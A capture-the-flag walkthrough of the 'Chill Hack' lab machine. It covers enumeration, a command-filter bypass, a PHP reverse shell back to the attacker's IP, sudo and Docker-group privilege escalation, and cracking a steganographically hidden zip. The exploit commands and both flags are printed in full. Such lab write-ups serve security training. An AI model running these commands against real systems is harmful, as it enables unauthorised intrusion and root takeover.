Chill Hack

Task 1 Investigate!

User Flag

Let's run a simple nmap scan against the target machine.

$ nmap -sC -sV 10.10.159.234
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-14 13:23 IST
Nmap scan report for 10.10.159.234
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.48.138
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Game Info
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.15 seconds

There are three open ports:

Port

Service

ftp

ssh

http

We can connect anonymously through FTP.

$ ftp anonymous@10.10.159.234
Connected to 10.10.159.234.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

There is a note.txt file that we can download on our machine using the get command.

ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||62537|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |***********************************************************************************************************************************************************************************************|    90      348.77 KiB/s    00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (0.68 KiB/s)

Let's cat out the note.txt file.

$ cat note.txt   
Anurodh told me that there is some filtering on strings being put in the command -- Apaar

So there is some page where we can input commands which are then filtered.
Let's try to find out the page where this is happening using gobuster.

$ gobuster dir -u http://10.10.159.234 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.159.234
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.10.159.234/css/]
/fonts                (Status: 301) [Size: 314] [--> http://10.10.159.234/fonts/]
/images               (Status: 301) [Size: 315] [--> http://10.10.159.234/images/]
/index.html           (Status: 200) [Size: 35184]
/js                   (Status: 301) [Size: 311] [--> http://10.10.159.234/js/]
/secret               (Status: 301) [Size: 315] [--> http://10.10.159.234/secret/]
/server-status        (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

The /secret page looks interesting, let's visit it through our browser.

As we can see this is the page where we can input commands.
Let's pass the following command:

id

Looks like it worked.
Let's list out the content of the directory:

ls -la

Ah so our command probably matched some black-list string and was filtered.
We can try to bypass the filter using single quotes:

l's' -la

There is an index.php file. If we can manage to read it, we might be able to see how the black-list is implemented.
Let's cat it out.

cat index.php

We can do the same bypass as before with single quotes:

c'a't index.php

The layout looks different. That is because the ìndex.php file was read and executed.
We can now check the source code using CTRL+U.

Now we know what pattern are being filterd.

$blacklist = array('nc', 'python', 'bash','php','perl','rm','cat','head','tail','python3','more','less','sh','ls');

Let's set up a nc listener.

$ nc -nlvp 9999
Listening on [any] 9999...

Now we have to provide a PHP reverse shell:

p'h'p -r '$sock=fsockopen("10.17.48.138",9999);exec("/bin/sh -i <&3 >&3 2>&3");'

Let's check back on our listener.

$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.159.234] 39848
/bin/sh: 0: can't access tty; job control turned off
$

We can get a stable shell using the following command:

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/secret$

Let's chat files the www-data user can run using sudo.

www-data@ubuntu:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh

Let's take a better look at what the .helpline.sh file does.

www-data@ubuntu:/home$ cat /home/apaar/.helpline.sh
cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"

So it uses the /bin/bash interpreter for all of the user input. Which means we we should be able to get a shell.

www-data@ubuntu:/var/www/files/images$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: knign
knign
Hello user! I am knign,  Please enter your message: /bin/bash
/bin/bash
id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
apaar@ubuntu:/var/www/files/images$

Let's get the flag from /user.txt.

apaar@ubuntu:~$ cat /home/apaar/local.txt
cat /home/apaar/local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}

Answer

{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}

Root Flag

Let's list out the contents of the directory.

apaar@ubuntu:/var/www/files/images$ ls -la
ls -la
total 2112
drwxr-xr-x 2 root root    4096 Oct  3  2020 .
drwxr-xr-x 3 root root    4096 Oct  3  2020 ..
-rw-r--r-- 1 root root 2083694 Oct  3  2020 002d7e638fb463fb7a266f5ffc7ac47d.gif
-rw-r--r-- 1 root root   68841 Oct  3  2020 hacker-with-laptop_23-2147985341.jpg

We can see that there is a JPG image.
Let's set up a Python3 server so that we can get this file from our attacker machine.

apaar@ubuntu:/var/www/files/images$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On our attacker machine we have to use wget to download the JPG file.

$ wget http://10.10.159.234:8000/hacker-with-laptop_23-2147985341.jpg
--2023-12-14 15:15:45--  http://10.10.159.234:8000/hacker-with-laptop_23-2147985341.jpg
Connecting to 10.10.159.234:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’

hacker-with-laptop_23-2147985341.jpg                       100%[========================================================================================================================================>]  67.23K   182KB/s    in 0.4s    

2023-12-14 15:15:46 (182 KB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]

Using steghide we can check if there is any embedded file or message and extract it.

$ steghide extract -sf hacker-with-laptop_23-2147985341.jpg 
Enter passphrase: 
wrote extracted data to "backup.zip".

Let's unzip the ZIP file.

$ unzip backup.zip                    
Archive:  backup.zip
[backup.zip] source_code.php password:

In order to unzip it we need a password.
We can use zip2john to convert the ZIP file into a hash.

$ zip2john backup.zip > backup_hash
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8

Now, using john we can crack the hash.

$ john --wordlist=/usr/share/wordlists/rockyou.txt backup_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word        (backup.zip/source_code.php)     
1g 0:00:00:00 DONE (2023-12-14 15:18) 4.166g/s 51200p/s 51200c/s 51200C/s horoscope..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Let's unzip the file using the pass1word password.

$ unzip backup.zip                                         
Archive:  backup.zip
[backup.zip] source_code.php password: 
  inflating: source_code.php

source_code.php

<?php
        if(isset($_POST['submit']))
        {
                $email = $_POST["email"];
                $password = $_POST["password"];
                if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
                { 
                        $random = rand(1000,9999);?><br><br><br>
                        <form method="POST">
                                Enter the OTP: <input type="number" name="otp">
                                <input type="submit" name="submitOtp" value="Submit">
                        </form>
                <?php   mail($email,"OTP for authentication",$random);
                        if(isset($_POST["submitOtp"]))
                                {
                                        $otp = $_POST["otp"];
                                        if($otp == $random)
                                        {
                                                echo "Welcome Anurodh!";
                                                header("Location: authenticated.php");
                                        }
                                        else
                                        {
                                                echo "Invalid OTP";
                                        }
                                }
                }
                else
                {
                        echo "Invalid Username or Password";
                }
        }
?>

In the source_code.php file we can see a message for a user Anurodh and a Base64 encoded password.
Let's decode the password using base64.

$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
!d0ntKn0wmYp@ssw0rd

We can now login through SSH as the user anurodh using the !d0ntKn0wmYp@ssw0rd password.

$ ssh anurodh@10.10.159.234                                
The authenticity of host '10.10.159.234 (10.10.159.234)' can't be established.
ED25519 key fingerprint is SHA256:mDI9eoI+sD1gmuE1Vl2iLvyVIopHnZlbAEFxr82BFwc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.159.234' (ED25519) to the list of known hosts.
anurodh@10.10.159.234's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec 14 09:53:01 UTC 2023

  System load:  0.08               Processes:              134
  Usage of /:   24.8% of 18.57GB   Users logged in:        0
  Memory usage: 22%                IP address for eth0:    10.10.159.234
  Swap usage:   0%                 IP address for docker0: 172.17.0.1


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

19 packages can be updated.
0 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

anurodh@ubuntu:~$

Using the id command we can check the groups that the anurodh user is part of.

anurodh@ubuntu:~$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)

So the anurodh user is part of the docker group.
We can find an exploit for Docker on GTFOBins.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Let's use the exploit without the sudo.

anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

We are now the root user and can read the root flag.

# cat /root/proof.txt
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}}

Answer

{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}}

Last updated 2 years ago

Was this helpful?